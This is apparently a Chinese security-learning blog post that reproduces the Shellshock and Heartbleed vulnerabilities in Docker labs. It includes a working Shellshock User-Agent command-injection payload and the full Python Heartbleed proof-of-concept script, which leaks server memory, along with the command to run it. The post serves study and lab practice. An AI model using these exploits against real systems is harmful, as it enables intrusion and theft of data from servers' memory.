其实最近的确是想更新一些文章的,但一直在忙于挖洞和挖洞技巧学习,前者肯定不能发真实案例,后者学的太零碎太杂,自己也处于一个积累的过程,发一些边边角角的内容也没意思。
虽然相比以前的确有了一点进步,但我仍然处于一个很差的水平,还是得慢慢积累。当然,漏洞那么多也不可能一个一个复现,现在重点是抓危害大,范围广的漏洞。对于那些利用条件困难,危害有限,范围小的先放一放。
目录
破壳漏洞【CVE-2014-6271】
具体分析
ShellShock(破壳漏洞)的简单分析_爱唠叨的老鱼的博客-CSDN博客_shellshock
说人话就是通过 echo bash -(命令执行语句)(echo类似于我们c语言的printf(输出语句))直接让linux系统执行命令。
说直白一点 也就是是你 printf什么内容,linux操作系统就执行什么命令。
而这个危害如此之大的漏洞(相比而言 log4j2 就是弟弟),居然持续了20多年。
如果想仔细了解其中原理的话(bash shell linux操作系统环境变量 ) 可以自行百度,(罗里吧嗦也不是我的(非)性(常)格(菜))
docker复现
进入到文件夹 打开终端
su root 之后输入登陆密码获取权限
docker-compose up -d 打开docker
等待加载完毕
dokcer ps 查看是否开启环境
设置与主机直连的桥接网络 方便我们之后用burpsuite 抓包
ifconfig
找到ens33下的ip地址 这就是我们创建的docker网址
访问
你的ens33的ip地址:8080/victim.cgi
抓包 把User-Agent字段改为
User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/i
发包 可查看到系统执行了我们的命令
echo; /usr/bin/i 也就是类似于 windows 下 whoami 命令
对linux系统了解的老哥可以试试其他命令
心脏滴血漏洞 【CVE-2014-0160】
同为 2014 年的重大漏洞,心脏滴血漏洞并没有破壳漏洞危害那么大,但这个漏洞的危害也不容小觑。
具体分析
OpenSSL Heartbleed漏洞(CVE-2014-0160)简要分析和检测_Traxer的博客-CSDN博客
上面这老哥图文并茂(甚至还夹杂着一点感情)研究的很透彻 。
不过看到这,我就简单的介绍一下为什么叫心脏滴血漏洞把。
在OpenSSL(一个常用的安全协议,主要是用于数据包的加密), 这个开源项目有一个扩展包:Heartbeat Packet (简称心跳包)
这个心跳包有一个特点 一般最大长度为16381字节,而我们通过恶意修改这个数据包的长度的话(把这个心跳包变大),受害者服务器接受到后,发送的返回包会包含其(受害服务器)内存数据(最大不超过64k)。(这也就是叫滴血的过程,)
docker复现
搭建docker 与上一个漏洞相似,以后不在赘述。
POC
#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') hb = h2bin(''' 18 03 02 00 03 01 40 00 ''') def hexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print ' %04x: %-48s %s' % (b, hxdat, pdat) print def recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False if typ == 24: print 'Received heartbeat response:' hexdump(pay) if len(pay) > 3: print 'WARNING: server returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return True if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return False def main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() s.connect((args[0], opts.port)) print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hit_hb(s) if __name__ == '__main__': main()
命令
python2 ssltest.py 192.168.86.128 443
结果:可以看到获.取了受害机的一部分内存信息。
参考链接